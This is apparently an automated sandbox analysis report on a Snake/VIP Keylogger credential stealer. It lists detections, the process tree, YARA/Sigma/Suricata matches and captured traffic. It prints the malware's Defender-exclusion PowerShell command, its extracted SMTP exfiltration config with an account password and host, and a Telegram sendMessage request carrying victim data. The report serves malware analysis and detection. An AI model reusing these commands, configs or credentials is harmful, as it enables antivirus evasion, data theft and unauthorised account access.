Edit tour

Windows Analysis Report
2Lzx7LMDWV.exe

Overview

General Information

Sample name:	2Lzx7LMDWV.exe renamed because original name is a hash value
Original sample name:	f70379292f5c009d309aa771803b8a47.exe
Analysis ID:	1546535
MD5:	f70379292f5c009d309aa771803b8a47
SHA1:	146e5ac87cb3c65624b027fa925861be2bde0003
SHA256:	dc9e448e51f4504726d8fdccfce805dfb4c228091f12a194fef40b2a86aa5eb2
Tags:	32exe
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

2Lzx7LMDWV.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\2Lzx7LMDWV.exe" MD5: F70379292F5C009D309AA771803B8A47)

powershell.exe (PID: 7604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7808 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

2Lzx7LMDWV.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\2Lzx7LMDWV.exe" MD5: F70379292F5C009D309AA771803B8A47)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "yugolog@falconcables.info", "Password": "7213575aceACE@@  ", "Host": "185.198.59.26", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "yugolog@falconcables.info", "Password": "7213575aceACE@@  ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daa0:$a1: get_encryptedPassword 0x2e028:$a2: get_encryptedUsername 0x2d713:$a3: get_timePasswordChanged 0x2d82a:$a4: get_passwordField 0x2dab6:$a5: set_encryptedPassword 0x307d2:$a6: get_passwords 0x30b66:$a7: get_logins 0x307be:$a8: GetOutlookPasswords 0x30177:$a9: StartKeylogger 0x30abf:$a10: KeyLoggerEventArgs 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.4145541161.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.4145541161.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1720387451.0000000003E3B000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x361d80:$a1: get_encryptedPassword 0x3a4da0:$a1: get_encryptedPassword 0x3e7bc0:$a1: get_encryptedPassword 0x362308:$a2: get_encryptedUsername 0x3a5328:$a2: get_encryptedUsername 0x3e8148:$a2: get_encryptedUsername 0x3619f3:$a3: get_timePasswordChanged 0x3a4a13:$a3: get_timePasswordChanged 0x3e7833:$a3: get_timePasswordChanged 0x361b0a:$a4: get_passwordField 0x3a4b2a:$a4: get_passwordField 0x3e794a:$a4: get_passwordField 0x361d96:$a5: set_encryptedPassword 0x3a4db6:$a5: set_encryptedPassword 0x3e7bd6:$a5: set_encryptedPassword 0x364ab2:$a6: get_passwords 0x3a7ad2:$a6: get_passwords 0x3ea8f2:$a6: get_passwords 0x364e46:$a7: get_logins 0x3a7e66:$a7: get_logins 0x3eac86:$a7: get_logins
Process Memory Space: 2Lzx7LMDWV.exe PID: 7416	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 2Lzx7LMDWV.exe PID: 7416	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 2Lzx7LMDWV.exe PID: 7416	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: 2Lzx7LMDWV.exe PID: 7416	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 2Lzx7LMDWV.exe PID: 7416	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6e5e9:$a1: get_encryptedPassword 0x6ea8e:$a2: get_encryptedUsername 0x6e27e:$a3: get_timePasswordChanged 0x6e389:$a4: get_passwordField 0x6e5ff:$a5: set_encryptedPassword 0x70e44:$a6: get_passwords 0x7111b:$a7: get_logins 0x70e30:$a8: GetOutlookPasswords 0x70872:$a9: StartKeylogger 0x71089:$a10: KeyLoggerEventArgs 0x70912:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: 2Lzx7LMDWV.exe PID: 7620	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 2Lzx7LMDWV.exe PID: 7620	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: 2Lzx7LMDWV.exe PID: 7620	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 2Lzx7LMDWV.exe PID: 7620	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xaaa6d:$a1: get_encryptedPassword 0xaafeb:$a2: get_encryptedUsername 0xaa6ef:$a3: get_timePasswordChanged 0xaa806:$a4: get_passwordField 0xaaa83:$a5: set_encryptedPassword 0xad747:$a6: get_passwords 0xadad7:$a7: get_logins 0xad733:$a8: GetOutlookPasswords 0xad0ec:$a9: StartKeylogger 0xada30:$a10: KeyLoggerEventArgs 0xad18c:$a11: KeyLoggerEventArgsEventHandler
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x394b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b59:$a3: \Google\Chrome\User Data\Default\Login Data 0x38db6:$a4: \Orbitum\User Data\Default\Login Data 0x39795:$a5: \Kometa\User Data\Default\Login Data
0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
4.2.2Lzx7LMDWV.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.2Lzx7LMDWV.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.2Lzx7LMDWV.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
4.2.2Lzx7LMDWV.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.2.2Lzx7LMDWV.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
4.2.2Lzx7LMDWV.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a959:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abb6:$a4: \Orbitum\User Data\Default\Login Data 0x3b595:$a5: \Kometa\User Data\Default\Login Data
4.2.2Lzx7LMDWV.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b2b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e2d6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc10f6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a959:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d979:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0799:$a3: \Google\Chrome\User Data\Default\Login Data 0x3abb6:$a4: \Orbitum\User Data\Default\Login Data 0x7dbd6:$a4: \Orbitum\User Data\Default\Login Data 0xc09f6:$a4: \Orbitum\User Data\Default\Login Data 0x3b595:$a5: \Kometa\User Data\Default\Login Data 0x7e5b5:$a5: \Kometa\User Data\Default\Login Data 0xc13d5:$a5: \Kometa\User Data\Default\Login Data
0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb28c0:$a1: get_encryptedPassword 0xf58e0:$a1: get_encryptedPassword 0x138700:$a1: get_encryptedPassword 0xb2e48:$a2: get_encryptedUsername 0xf5e68:$a2: get_encryptedUsername 0x138c88:$a2: get_encryptedUsername 0xb2533:$a3: get_timePasswordChanged 0xf5553:$a3: get_timePasswordChanged 0x138373:$a3: get_timePasswordChanged 0xb264a:$a4: get_passwordField 0xf566a:$a4: get_passwordField 0x13848a:$a4: get_passwordField 0xb28d6:$a5: set_encryptedPassword 0xf58f6:$a5: set_encryptedPassword 0x138716:$a5: set_encryptedPassword 0xb55f2:$a6: get_passwords 0xf8612:$a6: get_passwords 0x13b432:$a6: get_passwords 0xb5986:$a7: get_logins 0xf89a6:$a7: get_logins 0x13b7c6:$a7: get_logins
0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb3c84:$s1: UnHook 0xf6ca4:$s1: UnHook 0x139ac4:$s1: UnHook 0xb3c8b:$s2: SetHook 0xf6cab:$s2: SetHook 0x139acb:$s2: SetHook 0xb3c93:$s3: CallNextHook 0xf6cb3:$s3: CallNextHook 0x139ad3:$s3: CallNextHook 0xb3ca0:$s4: _hook 0xf6cc0:$s4: _hook 0x139ae0:$s4: _hook
0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1374e0:$a1: get_encryptedPassword 0x17a500:$a1: get_encryptedPassword 0x1bd320:$a1: get_encryptedPassword 0x137a68:$a2: get_encryptedUsername 0x17aa88:$a2: get_encryptedUsername 0x1bd8a8:$a2: get_encryptedUsername 0x137153:$a3: get_timePasswordChanged 0x17a173:$a3: get_timePasswordChanged 0x1bcf93:$a3: get_timePasswordChanged 0x13726a:$a4: get_passwordField 0x17a28a:$a4: get_passwordField 0x1bd0aa:$a4: get_passwordField 0x1374f6:$a5: set_encryptedPassword 0x17a516:$a5: set_encryptedPassword 0x1bd336:$a5: set_encryptedPassword 0x13a212:$a6: get_passwords 0x17d232:$a6: get_passwords 0x1c0052:$a6: get_passwords 0x13a5a6:$a7: get_logins 0x17d5c6:$a7: get_logins 0x1c03e6:$a7: get_logins
0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1388a4:$s1: UnHook 0x17b8c4:$s1: UnHook 0x1be6e4:$s1: UnHook 0x1388ab:$s2: SetHook 0x17b8cb:$s2: SetHook 0x1be6eb:$s2: SetHook 0x1388b3:$s3: CallNextHook 0x17b8d3:$s3: CallNextHook 0x1be6f3:$s3: CallNextHook 0x1388c0:$s4: _hook 0x17b8e0:$s4: _hook 0x1be700:$s4: _hook
Click to see the 27 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2Lzx7LMDWV.exe", ParentImage: C:\Users\user\Desktop\2Lzx7LMDWV.exe, ParentProcessId: 7416, ParentProcessName: 2Lzx7LMDWV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe", ProcessId: 7604, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2Lzx7LMDWV.exe", ParentImage: C:\Users\user\Desktop\2Lzx7LMDWV.exe, ParentProcessId: 7416, ParentProcessName: 2Lzx7LMDWV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2Lzx7LMDWV.exe", ProcessId: 7604, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T04:49:18.286659+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49750	TCP
2024-11-01T04:49:39.016010+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	50301	TCP
2024-11-01T04:49:40.311678+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	50302	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T04:49:06.308956+0100	2803305	3	Unknown Traffic	192.168.2.4	49736	188.114.96.3	443	TCP
2024-11-01T04:49:09.630312+0100	2803305	3	Unknown Traffic	192.168.2.4	49741	188.114.96.3	443	TCP
2024-11-01T04:49:11.272632+0100	2803305	3	Unknown Traffic	192.168.2.4	49743	188.114.96.3	443	TCP
2024-11-01T04:49:16.147276+0100	2803305	3	Unknown Traffic	192.168.2.4	49749	188.114.97.3	443	TCP
2024-11-01T04:49:17.783694+0100	2803305	3	Unknown Traffic	192.168.2.4	49752	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T04:49:04.113487+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	193.122.6.168	80	TCP
2024-11-01T04:49:05.582248+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	193.122.6.168	80	TCP
2024-11-01T04:49:07.222862+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 2Lzx7LMDWV.exe

Avira: detected

Found malware configuration

Source: 00000004.00000002.4143678149.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "yugolog@falconcables.info", "Password": "7213575aceACE@@ ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}
Source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "yugolog@falconcables.info", "Password": "7213575aceACE@@ ", "Host": "185.198.59.26", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: 2Lzx7LMDWV.exe	ReversingLabs: Detection: 31%
Source: 2Lzx7LMDWV.exe	Virustotal: Detection: 29%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 2Lzx7LMDWV.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 2Lzx7LMDWV.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49754 version: TLS 1.2

Source: 2Lzx7LMDWV.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4x nop then jmp 02CCF8E9h		4_2_02CCF631
Source: C:\Users\user\Desktop\2Lzx7LMDWV.exe	Code function: 4x nop then jmp 02CCFD41h		4_2_02CCFA88

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.2Lzx7LMDWV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.416f0e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.40ea4c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2Lzx7LMDWV.exe.40658a0.2.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.82 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2001/11/2024%20/%2015:20:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 188.114.96.3:443
